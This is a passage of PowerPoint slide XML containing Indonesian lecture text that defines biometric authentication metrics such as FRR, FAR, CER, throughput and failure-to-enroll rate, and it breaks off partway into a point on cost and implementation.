            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dievaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tingkat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penolakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>(False Rejection Rate/FRR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketidakcocokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (FNMR). FRR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persentase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>False Acceptance Rate (FAR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> II </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecocokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> [FMR]). FAR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persentase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penolakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketidaknyamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerimaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Crossover Error Rate (CER)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana FRR dan FAR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CER, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>andal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyetel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sampai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tercapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Throughput (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kecepatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> template </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bandara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stasiun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kereta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tingkat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pendaftaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (FER)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>templat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicocokkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendaftaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
